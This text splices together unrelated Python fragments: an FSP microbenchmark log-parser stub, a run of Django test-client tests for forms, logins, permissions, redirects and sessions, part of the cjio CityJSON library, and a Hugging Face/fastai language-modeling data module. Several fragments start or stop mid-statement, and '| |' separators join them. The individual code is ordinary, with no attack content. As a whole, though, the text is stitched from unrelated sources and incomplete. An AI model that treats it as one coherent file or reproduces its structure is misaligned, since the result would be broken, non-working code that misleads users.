description="Parse FSP microbenchmark log")
parser.add_argument('--fs',
help='file system type [fsp|ext4|ext4nj]',
required=True)
parser.add_argument('--dir', help='dir name of the logs', required=True)
parser.add_argument('--rno',
| |
required.')
self.assertFormError(response, 'form', 'multi', 'This field is required.')
def test_form_error(self):
"POST erroneous data to a form"
post_data = {
'text': '<NAME>',
'email': 'not an email address',
'value': 37,
'single': 'b',
'multi': ('b', 'c', 'e')
}
response = self.client.post('/form_view/', post_data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "Invalid POST Template")
self.assertFormError(response, 'form', 'email', 'Enter a valid email address.')
def test_valid_form_with_template(self):
"POST valid data to a form using multiple templates"
post_data = {
'text': '<NAME>',
'email': '<EMAIL>',
'value': 37,
'single': 'b',
'multi': ('b', 'c', 'e')
}
response = self.client.post('/form_view_with_template/', post_data)
self.assertContains(response, 'POST data OK')
self.assertTemplateUsed(response, "form_view.html")
self.assertTemplateUsed(response, 'base.html')
self.assertTemplateNotUsed(response, "Valid POST Template")
def test_incomplete_data_form_with_template(self):
"POST incomplete data to a form using multiple templates"
post_data = {
'text': '<NAME>',
'value': 37
}
response = self.client.post('/form_view_with_template/', post_data)
self.assertContains(response, 'POST data has errors')
self.assertTemplateUsed(response, 'form_view.html')
self.assertTemplateUsed(response, 'base.html')
self.assertTemplateNotUsed(response, "Invalid POST Template")
self.assertFormError(response, 'form', 'email', 'This field is required.')
self.assertFormError(response, 'form', 'single', 'This field is required.')
self.assertFormError(response, 'form', 'multi', 'This field is required.')
def test_form_error_with_template(self):
"POST erroneous data to a form using multiple templates"
post_data = {
'text': '<NAME>',
'email': 'not an email address',
'value': 37,
'single': 'b',
'multi': ('b', 'c', 'e')
}
response = self.client.post('/form_view_with_template/', post_data)
self.assertContains(response, 'POST data has errors')
self.assertTemplateUsed(response, "form_view.html")
self.assertTemplateUsed(response, 'base.html')
self.assertTemplateNotUsed(response, "Invalid POST Template")
self.assertFormError(response, 'form', 'email', 'Enter a valid email address.')
def test_unknown_page(self):
"GET an invalid URL"
response = self.client.get('/unknown_view/')
# The response was a 404
self.assertEqual(response.status_code, 404)
def test_url_parameters(self):
"Make sure that URL ;-parameters are not stripped."
response = self.client.get('/unknown_view/;some-parameter')
# The path in the response includes it (ignore that it's a 404)
self.assertEqual(response.request['PATH_INFO'], '/unknown_view/;some-parameter')
def test_view_with_login(self):
"Request a page that is protected with @login_required"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
@override_settings(
INSTALLED_APPS=['django.contrib.auth'],
SESSION_ENGINE='django.contrib.sessions.backends.file',
)
def test_view_with_login_when_sessions_app_is_not_installed(self):
self.test_view_with_login()
def test_view_with_force_login(self):
"Request a page that is protected with @login_required"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
# Log in
self.client.force_login(self.u1)
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
def test_view_with_method_login(self):
"Request a page that is protected with a @login_required method"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_method_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_method_view/')
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Request a page that requires a login
response = self.client.get('/login_protected_method_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
def test_view_with_method_force_login(self):
"Request a page that is protected with a @login_required method"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_method_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_method_view/')
# Log in
self.client.force_login(self.u1)
# Request a page that requires a login
response = self.client.get('/login_protected_method_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
def test_view_with_login_and_custom_redirect(self):
"Request a page that is protected with @login_required(redirect_field_name='redirect_to')"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view_custom_redirect/')
self.assertRedirects(response, '/accounts/login/?redirect_to=/login_protected_view_custom_redirect/')
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Request a page that requires a login
response = self.client.get('/login_protected_view_custom_redirect/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
def test_view_with_force_login_and_custom_redirect(self):
"""
Request a page that is protected with
@login_required(redirect_field_name='redirect_to')
"""
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view_custom_redirect/')
self.assertRedirects(response, '/accounts/login/?redirect_to=/login_protected_view_custom_redirect/')
# Log in
self.client.force_login(self.u1)
# Request a page that requires a login
response = self.client.get('/login_protected_view_custom_redirect/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
def test_view_with_bad_login(self):
"Request a page that is protected with @login, but use bad credentials"
login = self.client.login(username='otheruser', password='<PASSWORD>')
self.assertFalse(login)
def test_view_with_inactive_login(self):
"""
An inactive user may login if the authenticate backend allows it.
"""
credentials = {'username': 'inactive', 'password': 'password'}
self.assertFalse(self.client.login(**credentials))
with self.settings(AUTHENTICATION_BACKENDS=['django.contrib.auth.backends.AllowAllUsersModelBackend']):
self.assertTrue(self.client.login(**credentials))
@override_settings(
AUTHENTICATION_BACKENDS=[
'django.contrib.auth.backends.ModelBackend',
'django.contrib.auth.backends.AllowAllUsersModelBackend',
]
)
def test_view_with_inactive_force_login(self):
"Request a page that is protected with @login, but use an inactive login"
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
# Log in
self.client.force_login(self.u2, backend='django.contrib.auth.backends.AllowAllUsersModelBackend')
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'inactive')
def test_logout(self):
"Request a logout after logging in"
# Log in
self.client.login(username='testclient', password='password')
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
# Log out
self.client.logout()
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
def test_logout_with_force_login(self):
"Request a logout after logging in"
# Log in
self.client.force_login(self.u1)
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
# Log out
self.client.logout()
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
@override_settings(
AUTHENTICATION_BACKENDS=[
'django.contrib.auth.backends.ModelBackend',
'test_client.auth_backends.TestClientBackend',
],
)
def test_force_login_with_backend(self):
"""
Request a page that is protected with @login_required when using
force_login() and passing a backend.
"""
# Get the page without logging in. Should result in 302.
response = self.client.get('/login_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/login_protected_view/')
# Log in
self.client.force_login(self.u1, backend='test_client.auth_backends.TestClientBackend')
self.assertEqual(self.u1.backend, 'test_client.auth_backends.TestClientBackend')
# Request a page that requires a login
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
@override_settings(
AUTHENTICATION_BACKENDS=[
'django.contrib.auth.backends.ModelBackend',
'test_client.auth_backends.TestClientBackend',
],
)
def test_force_login_without_backend(self):
"""
force_login() without passing a backend and with multiple backends
configured should automatically use the first backend.
"""
self.client.force_login(self.u1)
response = self.client.get('/login_protected_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].username, 'testclient')
self.assertEqual(self.u1.backend, 'django.contrib.auth.backends.ModelBackend')
@override_settings(AUTHENTICATION_BACKENDS=[
'test_client.auth_backends.BackendWithoutGetUserMethod',
'django.contrib.auth.backends.ModelBackend',
])
def test_force_login_with_backend_missing_get_user(self):
"""
force_login() skips auth backends without a get_user() method.
"""
self.client.force_login(self.u1)
self.assertEqual(self.u1.backend, 'django.contrib.auth.backends.ModelBackend')
@override_settings(SESSION_ENGINE="django.contrib.sessions.backends.signed_cookies")
def test_logout_cookie_sessions(self):
self.test_logout()
def test_view_with_permissions(self):
"Request a page that is protected with @permission_required"
# Get the page without logging in. Should result in 302.
response = self.client.get('/permission_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/permission_protected_view/')
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Log in with wrong permissions. Should result in 302.
response = self.client.get('/permission_protected_view/')
self.assertRedirects(response, '/accounts/login/?next=/permission_protected_view/')
# TODO: Log in with right permissions and request the page again
def test_view_with_permissions_exception(self):
"Request a page that is protected with @permission_required but raises an exception"
# Get the page without logging in. Should result in 403.
response = self.client.get('/permission_protected_view_exception/')
self.assertEqual(response.status_code, 403)
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Log in with wrong permissions. Should result in 403.
response = self.client.get('/permission_protected_view_exception/')
self.assertEqual(response.status_code, 403)
def test_view_with_method_permissions(self):
"Request a page that is protected with a @permission_required method"
# Get the page without logging in. Should result in 302.
response = self.client.get('/permission_protected_method_view/')
self.assertRedirects(response, '/accounts/login/?next=/permission_protected_method_view/')
# Log in
login = self.client.login(username='testclient', password='password')
self.assertTrue(login, 'Could not log in')
# Log in with wrong permissions. Should result in 302.
response = self.client.get('/permission_protected_method_view/')
self.assertRedirects(response, '/accounts/login/?next=/permission_protected_method_view/')
# TODO: Log in with right permissions and request the page again
def test_external_redirect(self):
response = self.client.get('/django_project_redirect/')
self.assertRedirects(response, 'https://www.djangoproject.com/', fetch_redirect_response=False)
def test_external_redirect_without_trailing_slash(self):
"""
Client._handle_redirects() with an empty path.
"""
response = self.client.get('/no_trailing_slash_external_redirect/', follow=True)
self.assertRedirects(response, 'https://testserver')
def test_external_redirect_with_fetch_error_msg(self):
"""
assertRedirects without fetch_redirect_response=False raises
a relevant ValueError rather than a non-descript AssertionError.
"""
response = self.client.get('/django_project_redirect/')
msg = (
"The test client is unable to fetch remote URLs (got "
"https://www.djangoproject.com/). If the host is served by Django, "
"add 'www.djangoproject.com' to ALLOWED_HOSTS. "
"Otherwise, use assertRedirects(..., fetch_redirect_response=False)."
)
with self.assertRaisesMessage(ValueError, msg):
self.assertRedirects(response, 'https://www.djangoproject.com/')
def test_session_modifying_view(self):
"Request a page that modifies the session"
# Session value isn't set initially
with self.assertRaises(KeyError):
self.client.session['tobacconist']
self.client.post('/session_view/')
# The session was modified
self.assertEqual(self.client.session['tobacconist'], 'hovercraft')
@override_settings(
INSTALLED_APPS=[],
SESSION_ENGINE='django.contrib.sessions.backends.file',
)
def test_sessions_app_is_not_installed(self):
self.test_session_modifying_view()
@override_settings(
INSTALLED_APPS=[],
SESSION_ENGINE='django.contrib.sessions.backends.nonexistent',
)
def test_session_engine_is_invalid(self):
with self.assertRaisesMessage(ImportError, 'nonexistent'):
self.test_session_modifying_view()
def test_view_with_exception(self):
"Request a page that is known to throw an error"
with self.assertRaises(KeyError):
self.client.get("/broken_view/")
def test_exc_info(self):
client = Client(raise_request_exception=False)
response = client.get("/broken_view/")
self.assertEqual(response.status_code, 500)
exc_type, exc_value, exc_traceback = response.exc_info
self.assertIs(exc_type, KeyError)
self.assertIsInstance(exc_value, KeyError)
self.assertEqual(str(exc_value), "'Oops! Looks like you wrote some bad code.'")
self.assertIsNotNone(exc_traceback)
def test_exc_info_none(self):
response = self.client.get("/get_view/")
self.assertIsNone(response.exc_info)
def test_mail_sending(self):
"Mail is redirected to a dummy outbox during test setup"
response = self.client.get('/mail_sending_view/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'Test message')
self.assertEqual(mail.outbox[0].body, 'This is a test email')
self.assertEqual(mail.outbox[0].from_email, '<EMAIL>')
self.assertEqual(mail.outbox[0].to[0], '<EMAIL>')
self.assertEqual(mail.outbox[0].to[1], '<EMAIL>')
def test_reverse_lazy_decodes(self):
"reverse_lazy() works in the test client"
data = {'var': 'data'}
| |
import os
import re
import shutil
import json
import collections
import jsonref
from pkg_resources import resource_filename
from pkg_resources import resource_listdir
import copy
import random
from io import StringIO
from sys import platform
from click import progressbar
from datetime import datetime, date
MODULE_NUMPY_AVAILABLE = True
MODULE_PYPROJ_AVAILABLE = True
MODULE_EARCUT_AVAILABLE = True
MODULE_PANDAS_AVAILABLE = True
try:
import numpy as np
except ImportError as e:
MODULE_NUMPY_AVAILABLE = False
try:
import pyproj
except ImportError as e:
MODULE_PYPROJ_AVAILABLE = False
try:
import mapbox_earcut
except ImportError as e:
MODULE_EARCUT_AVAILABLE = False
try:
import pandas
except ImportError as e:
MODULE_PANDAS_AVAILABLE = False
from cjio import validation, subset, geom_help, convert, models
from cjio.errors import InvalidOperation
from cjio.utils import print_cmd_warning
from cjio.metadata import generate_metadata
CITYJSON_VERSIONS_SUPPORTED = ['0.6', '0.8', '0.9', '1.0']
TOPLEVEL = ('Building',
'Bridge',
'CityObjectGroup',
'CityFurniture',
'GenericCityObject',
'LandUse',
'PlantCover',
'Railway',
'Road',
'SolitaryVegetationObject',
'TINRelief',
'TransportSquare',
'Tunnel',
'WaterBody')
def load(path, transform:bool=False):
"""Load a CityJSON file for working with it though the API
:param path: Absolute path to a CityJSON file
:param transform: Apply the coordinate transformation to the vertices (if applicable)
:return: A CityJSON object
"""
with open(path, 'r') as fin:
try:
cm = CityJSON(file=fin)
except OSError as e:
raise FileNotFoundError
cm.cityobjects = dict()
if 'transform' in cm.j:
cm.transform = cm.j['transform']
else:
cm.transform = None
if transform:
do_transform = cm.transform
del cm.j['transform']
else:
do_transform = None
appearance = cm.j['appearance'] if 'appearance' in cm.j else None
for co_id, co in cm.j['CityObjects'].items():
# TODO BD: do some verification here
children = co['children'] if 'children' in co else None
parents = co['parents'] if 'parents' in co else None
attributes = co['attributes'] if 'attributes' in co else None
geometry = []
for geom in co['geometry']:
semantics = geom['semantics'] if 'semantics' in geom else None
texture = geom['texture'] if 'texture' in geom else None
geometry.append(
models.Geometry(
type=geom['type'],
lod=geom['lod'],
boundaries=geom['boundaries'],
semantics_obj=semantics,
texture_obj=texture,
appearance=appearance,
vertices=cm.j['vertices'],
transform=do_transform
)
)
cm.cityobjects[co_id] = models.CityObject(
id=co_id,
type=co['type'],
attributes=attributes,
children=children,
parents=parents,
geometry=geometry
)
return cm
def save(citymodel, path: str, indent: bool = False):
"""Save a city model to a CityJSON file
:param citymodel: A CityJSON object
:param path: Absolute path to a CityJSON file
"""
cityobjects, vertex_lookup = citymodel.reference_geometry()
citymodel.add_to_j(cityobjects, vertex_lookup)
# FIXME: here should be compression, however the current compression does not work with immutable tuples, but requires mutable lists for the points
citymodel.remove_duplicate_vertices()
citymodel.remove_orphan_vertices()
try:
with open(path, 'w') as fout:
if indent is None:
json_str = json.dumps(citymodel.j, separators=(',',':'))
else:
json_str = json.dumps(citymodel.j, indent=indent)
fout.write(json_str)
except IOError as e:
raise IOError('Invalid output file: %s \n%s' % (path, e))
def reader(file, ignore_duplicate_keys=False):
return CityJSON(file=file, ignore_duplicate_keys=ignore_duplicate_keys)
def off2cj(file):
l = file.readline()
# print(l)
while (len(l) <= 1) or (l[0] == '#') or (l[:3] == 'OFF'):
l = file.readline()
# print(l)
# print ('len', len(l))
numVertices = int(l.split()[0])
numFaces = int(l.split()[1])
lstVertices = []
for i in range(numVertices):
lstVertices.append(list(map(float, file.readline().split())))
lstFaces = []
for i in range(numFaces):
lstFaces.append(list(map(int, file.readline().split()[1:])))
cm = {}
cm["type"] = "CityJSON"
cm["version"] = CITYJSON_VERSIONS_SUPPORTED[-1]
cm["CityObjects"] = {}
cm["vertices"] = []
for v in lstVertices:
cm["vertices"].append(v)
g = {'type': 'Solid'}
shell = []
for f in lstFaces:
shell.append([f])
g['boundaries'] = [shell]
g['lod'] = 1
o = {'type': 'GenericCityObject'}
o['geometry'] = [g]
cm["CityObjects"]["id-1"] = o
return CityJSON(j=cm)
def poly2cj(file):
l = file.readline()
numVertices = int(l.split()[0])
lstVertices = []
for i in range(numVertices):
lstVertices.append(list(map(float, file.readline().split()))[1:])
numFaces = int(file.readline().split()[0])
lstFaces = []
holes = []
for i in range(numFaces):
l = file.readline()
irings = int(l.split()[0]) - 1
face = []
face.append(list(map(int, file.readline().split()[1:])))
for r in range(irings):
face.append(list(map(int, file.readline().split()[1:])))
file.readline()
lstFaces.append(face)
cm = {}
cm["type"] = "CityJSON"
cm["version"] = CITYJSON_VERSIONS_SUPPORTED[-1]
cm["CityObjects"] = {}
cm["vertices"] = []
for v in lstVertices:
cm["vertices"].append(v)
g = {'type': 'Solid'}
shell = []
for f in lstFaces:
shell.append(f)
g['boundaries'] = [shell]
g['lod'] = 1
o = {'type': 'GenericCityObject'}
o['geometry'] = [g]
cm["CityObjects"]["id-1"] = o
return CityJSON(j=cm)
class CityJSON:
def __init__(self, file=None, j=None, ignore_duplicate_keys=False):
if file is not None:
self.read(file, ignore_duplicate_keys)
self.path = os.path.abspath(file.name)
self.reference_date = datetime.fromtimestamp(os.path.getmtime(file.name)).strftime('%Y-%m-%d')
self.cityobjects = {}
elif j is not None:
self.j = j
self.cityobjects = {}
self.path = None
self.reference_date = datetime.now().strftime('%Y-%m-%d')
else: #-- create an empty one
self.j = {}
self.j["type"] = "CityJSON"
self.j["version"] = CITYJSON_VERSIONS_SUPPORTED[-1]
self.j["CityObjects"] = {}
self.j["vertices"] = []
self.cityobjects = {}
self.path = None
self.reference_date = datetime.now().strftime('%Y-%m-%d')
def __repr__(self):
return self.get_info()
##-- API functions
# TODO BD: refactor this whole CityJSON class
def get_cityobjects(self, type=None, id=None):
"""Return a subset of CityObjects
:param type: CityObject type. If a list of types are given, then all types in the list are returned.
:param id: CityObject ID. If a list of IDs are given, then all objects matching the IDs in the list are returned.
"""
if type is None and id is None:
return self.cityobjects
elif (type is not None) and (id is not None):
raise AttributeError("Please provide either 'type' or 'id'")
elif type is not None:
if isinstance(type, str):
type_list = [type.lower()]
elif isinstance(type, list) and isinstance(type[0], str):
type_list = [t.lower() for t in type]
else:
raise TypeError("'type' must be a string or list of strings")
return {i:co for i,co in self.cityobjects.items() if co.type.lower() in type_list}
elif id is not None:
if isinstance(id, str):
id_list = [id]
elif isinstance(id, list) and isinstance(id[0], str):
id_list = id
else:
raise TypeError("'id' must be a string or list of strings")
return {i:co for i,co in self.cityobjects.items() if co.id in id_list}
def set_cityobjects(self, cityobjects):
"""Creates or updates CityObjects
.. note:: If a CityObject with the same ID already exists in the model, it will be overwritten
:param cityobjects: Dictionary of CityObjects, where keys are the CityObject IDs. Same structure as returned by get_cityobjects()
"""
for co_id, co in cityobjects.items():
self.cityobjects[co_id] = co
def to_dataframe(self):
"""Converts the city model to a Pandas data frame where fields are CityObject attributes"""
if not MODULE_PANDAS_AVAILABLE:
raise ModuleNotFoundError("Modul 'pandas' is not available, please install it")
return pandas.DataFrame([co.attributes for co_id,co in self.cityobjects.items()],
index=list(self.cityobjects.keys()))
def reference_geometry(self):
"""Build a coordinate list and index the vertices for writing out to
CityJSON."""
cityobjects = dict()
vertex_lookup = dict()
vertex_idx = 0
for co_id, co in self.cityobjects.items():
j_co = co.to_json()
geometry, vertex_lookup, vertex_idx = co.build_index(vertex_lookup, vertex_idx)
j_co['geometry'] = geometry
cityobjects[co_id] = j_co
return cityobjects, vertex_lookup
def add_to_j(self, cityobjects, vertex_lookup):
self.j['vertices'] = [[vtx[0], vtx[1], vtx[2]] for vtx in vertex_lookup.keys()]
self.j['CityObjects'] = cityobjects
##-- end API functions
def get_version(self):
return self.j["version"]
def get_epsg(self):
if "metadata" not in self.j:
return None
if "crs" in self.j["metadata"] and "epsg" in self.j["metadata"]["crs"]:
return self.j["metadata"]["crs"]["epsg"]
elif "referenceSystem" in self.j["metadata"]:
s = self.j["metadata"]["referenceSystem"]
if "epsg" in s.lower():
return int(s[s.find("::")+2:])
else:
print_cmd_warning("Only EPSG codes are supported in the URN. CRS is set to undefined.")
return None
else:
return None
def is_empty(self):
if len(self.j["CityObjects"]) == 0:
return True
else:
return False
def is_transform(self):
return ("transform" in self.j)
def read(self, file, ignore_duplicate_keys=False):
if ignore_duplicate_keys == True:
self.j = json.loads(file.read())
else:
try:
self.j = json.loads(file.read(), object_pairs_hook=validation.dict_raise_on_duplicates)
except ValueError as err:
raise ValueError(err)
#-- a CityJSON file?
if "type" in self.j and self.j["type"] == "CityJSON":
pass
else:
self.j = {}
raise ValueError("Not a CityJSON file")
def fetch_schema(self, folder_schemas=None):
v = "-1"
if folder_schemas is None:
#-- fetch latest from x.y version (x.y.z)
tmp = resource_listdir(__name__, '/schemas/')
tmp.sort()
v = tmp[-1]
try:
schema = resource_filename(__name__, '/schemas/%s/cityjson.schema.json' % (v))
except:
return (False, None, '')
else:
schema = os.path.join(folder_schemas, 'cityjson.schema.json')
#-- open the schema
try:
fins = open(schema)
except:
return (False, None, '')
abs_path = os.path.abspath(os.path.dirname(schema))
#-- because Windows uses \ and not /
if platform == "darwin" or platform == "linux" or platform == "linux2":
base_uri = 'file://{}/'.format(abs_path)
else:
base_uri = 'file:///{}/'.format(abs_path.replace('\\', '/'))
js = jsonref.loads(fins.read(), jsonschema=True, base_uri=base_uri)
if v == "-1":
v = schema
return (True, js, v)
def fetch_schema_cityobjects(self, folder_schemas=None):
if folder_schemas is None:
#-- fetch proper schema from the stored ones
tmp = resource_listdir(__name__, '/schemas/')
tmp.sort()
v = tmp[-1]
try:
schema = resource_filename(__name__, '/schemas/%s/cityjson.schema.json' % (v))
except:
return (False, None)
else:
schema = os.path.join(folder_schemas, 'cityjson.schema.json')
abs_path = os.path.abspath(os.path.dirname(schema))
sco_path = abs_path + '/cityobjects.schema.json'
#-- because Windows uses \ and not /
if platform == "darwin" or platform == "linux" or platform == "linux2":
base_uri = 'file://{}/'.format(abs_path)
else:
base_uri = 'file:///{}/'.format(abs_path.replace('\\', | |
<gh_stars>0
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/12_text-data-language-modeling.ipynb (unless otherwise specified).
__all__ = ['LMPreprocessor', 'LMType', 'BaseLMStrategy', 'CausalLMStrategy', 'BertMLMStrategy', 'CausalLMTextInput',
'MLMTextInput', 'LMBatchTokenizeTransform']
# Cell
import os, random
from abc import ABC, abstractmethod
from enum import Enum
from datasets import Dataset
from fastcore.all import *
from fastai.imports import *
from fastai.losses import CrossEntropyLossFlat
from fastai.torch_core import *
from fastai.torch_imports import *
from transformers import (
AutoModelForCausalLM,
AutoModelForMaskedLM,
logging,
PretrainedConfig,
PreTrainedTokenizerBase,
PreTrainedModel,
BatchEncoding,
)
from .core import TextInput, BatchTokenizeTransform, Preprocessor, first_blurr_tfm
from ..utils import get_hf_objects
logging.set_verbosity_error()
# Cell
class LMPreprocessor(Preprocessor):
def __init__(
self,
# A Hugging Face tokenizer
hf_tokenizer: PreTrainedTokenizerBase,
# The number of examples to process at a time
batch_size: int = 1000,
# How big each chunk of text should be (default: hf_tokenizer.model_max_length)
chunk_size: Optional[int] = None,
# How to indicate the beginning on a new text example (default is hf_tokenizer.eos_token|sep_token
sep_token: Optional[str] = None,
# The attribute holding the text
text_attr: str = "text",
# The attribute that should be created if your are processing individual training and validation
# datasets into a single dataset, and will indicate to which each example is associated
is_valid_attr: Optional[str] = "is_valid",
# Tokenization kwargs that will be applied with calling the tokenizer
tok_kwargs: dict = {},
):
tok_kwargs = {**tok_kwargs, "truncation": False, "return_offsets_mapping": True}
super().__init__(hf_tokenizer, batch_size, text_attr, None, is_valid_attr, tok_kwargs)
self.chunk_size = chunk_size or hf_tokenizer.model_max_length
self.sep_token = sep_token or hf_tokenizer.eos_token or hf_tokenizer.sep_token
def process_df(self, training_df: pd.DataFrame, validation_df: Optional[pd.DataFrame] = None):
# process df in mini-batches
final_train_df = pd.DataFrame()
for g, batch_df in training_df.groupby(np.arange(len(training_df)) // self.batch_size):
final_train_df = final_train_df.append(self._process_df_batch(batch_df))
final_train_df.reset_index(drop=True, inplace=True)
final_val_df = pd.DataFrame() if validation_df is not None else None
if final_val_df is not None:
for g, batch_df in validation_df.groupby(np.arange(len(validation_df)) // self.batch_size):
final_val_df = final_val_df.append(self._process_df_batch(batch_df))
final_val_df.reset_index(drop=True, inplace=True)
final_df = super().process_df(final_train_df, final_val_df)
return final_df
def process_hf_dataset(self, training_ds: Dataset, validation_ds: Optional[Dataset] = None):
ds = super().process_hf_dataset(training_ds, validation_ds)
return Dataset.from_pandas(self.process_df(pd.DataFrame(ds)))
# ----- utility methods -----
def _process_df_batch(self, batch_df):
batch_df.reset_index(drop=True, inplace=True)
# concatenate our texts
concat_txts = {self.text_attr: f" {self.sep_token} ".join(batch_df[self.text_attr].values.tolist())}
inputs = self._tokenize_function(concat_txts)
# compute the length of our concatenated texts
n_total_toks = len(inputs["input_ids"])
# need to modify chunk_size to included the # of special tokens added
max_chunk_size = self.chunk_size - self.hf_tokenizer.num_special_tokens_to_add() - 1
# drop the last chunk of text if it is smaller than chunk size (see the HF course, section 7 on training MLMs)
total_length = (n_total_toks // max_chunk_size) * max_chunk_size
# break our concatenated into chunks of text of size max_chunk_size
examples = []
for i in range(0, total_length, max_chunk_size):
chunked_offsets = inputs["offset_mapping"][i : i + max_chunk_size]
chunked_text = concat_txts[self.text_attr][min(chunked_offsets)[0] : max(chunked_offsets)[1]]
examples.append(chunked_text)
return pd.DataFrame(examples, columns=[f"proc_{self.text_attr}"])
# Cell
class LMType(Enum):
"""Use this enum to indicate what kind of language model you are training"""
CAUSAL = 1
MASKED = 2
# Cell
class BaseLMStrategy(ABC):
"""ABC for various language modeling strategies (e.g., causal, BertMLM, WholeWordMLM, etc...)"""
def __init__(self, hf_tokenizer, ignore_token_id=CrossEntropyLossFlat().ignore_index):
store_attr(["hf_tokenizer", "ignore_token_id"])
@abstractmethod
def build_inputs_targets(self, samples, include_labels: bool = True, inputs: Optional[BatchEncoding] = None):
pass
# utility methods
def _get_random_token_id(self, n):
return random.sample(list(self.hf_tokenizer.get_vocab().values()), n)
@classmethod
@abstractmethod
def get_lm_type(cls):
pass
# Cell
class CausalLMStrategy(BaseLMStrategy):
"""For next token prediction language modeling tasks, we want to use the `CausalLMStrategy` which makes the
necessary changes in your inputs/targets for causal LMs
"""
def build_inputs_targets(self, samples, include_labels: bool = True, inputs: Optional[BatchEncoding] = None):
updated_samples = []
for s in samples:
if include_labels:
s[0]["labels"] = s[0]["input_ids"].clone()
s[0]["labels"][s[0]["labels"] == self.hf_tokenizer.pad_token_id] = self.ignore_token_id
targ_ids = torch.cat([s[0]["input_ids"][1:], tensor([self.hf_tokenizer.eos_token_id])])
updated_samples.append((s[0], targ_ids))
return updated_samples
@classmethod
def get_lm_type(cls: LMType):
return LMType.CAUSAL
# Cell
class BertMLMStrategy(BaseLMStrategy):
"""A masked language modeling strategy using the default BERT masking definition."""
def __init__(self, hf_tokenizer, ignore_token_id=CrossEntropyLossFlat().ignore_index):
super().__init__(hf_tokenizer, ignore_token_id)
vocab = hf_tokenizer.get_vocab()
self.dnm_tok_ids = [
vocab[tok] for tok in list(hf_tokenizer.special_tokens_map.values()) if vocab[tok] != hf_tokenizer.mask_token_id
]
def build_inputs_targets(self, samples, include_labels: bool = True, inputs: Optional[BatchEncoding] = None):
updated_samples = []
for s in samples:
# mask the input_ids
masked_input_ids = s[0]["input_ids"].clone()
# we want to mask 15% of the non-special tokens(e.g., special tokens inclue [CLS], [SEP], etc...)
idxs = torch.randperm(len(masked_input_ids))
total_masked_idxs = int(len(idxs) * 0.15)
# of the 15% for masking, replace 80% with [MASK] token, 10% with random token, and 10% with correct token
n_mask_idxs = int(total_masked_idxs * 0.8)
n_rnd_idxs = int(total_masked_idxs * 0.1)
# we only want non-special tokens
mask_idxs = [idx for idx in idxs if masked_input_ids[idx] not in self.dnm_tok_ids][:total_masked_idxs]
# replace 80% with [MASK]
if n_mask_idxs > 0 and len(mask_idxs) >= n_mask_idxs:
masked_input_ids[[mask_idxs[:n_mask_idxs]]] = self.hf_tokenizer.mask_token_id
# replace 10% with a random token
if n_rnd_idxs > 0 and len(mask_idxs) >= (n_mask_idxs + n_rnd_idxs):
rnd_tok_ids = self._get_random_token_id(n_rnd_idxs)
masked_input_ids[[mask_idxs[n_mask_idxs : (n_mask_idxs + n_rnd_idxs)]]] = tensor(rnd_tok_ids)
# ignore padding when calculating the loss
lbls = s[0]["input_ids"].clone()
lbls[[[idx for idx in idxs if idx not in mask_idxs]]] = self.ignore_token_id
# update the inputs to use our masked input_ids and labels; set targ_ids = labels (will use when
# we calculate the loss ourselves)
s[0]["input_ids"] = masked_input_ids
targ_ids = lbls
if include_labels:
s[0]["labels"] = targ_ids.clone()
updated_samples.append((s[0], targ_ids))
return updated_samples
@classmethod
def get_lm_type(cls: LMType):
return LMType.MASKED
# Cell
class CausalLMTextInput(TextInput):
pass
# export
class MLMTextInput(TextInput):
pass
# Cell
class LMBatchTokenizeTransform(BatchTokenizeTransform):
def __init__(
self,
# The abbreviation/name of your Hugging Face transformer architecture (e.b., bert, bart, etc..)
hf_arch: str,
# A specific configuration instance you want to use
hf_config: PretrainedConfig,
# A Hugging Face tokenizer
hf_tokenizer: PreTrainedTokenizerBase,
# A Hugging Face model
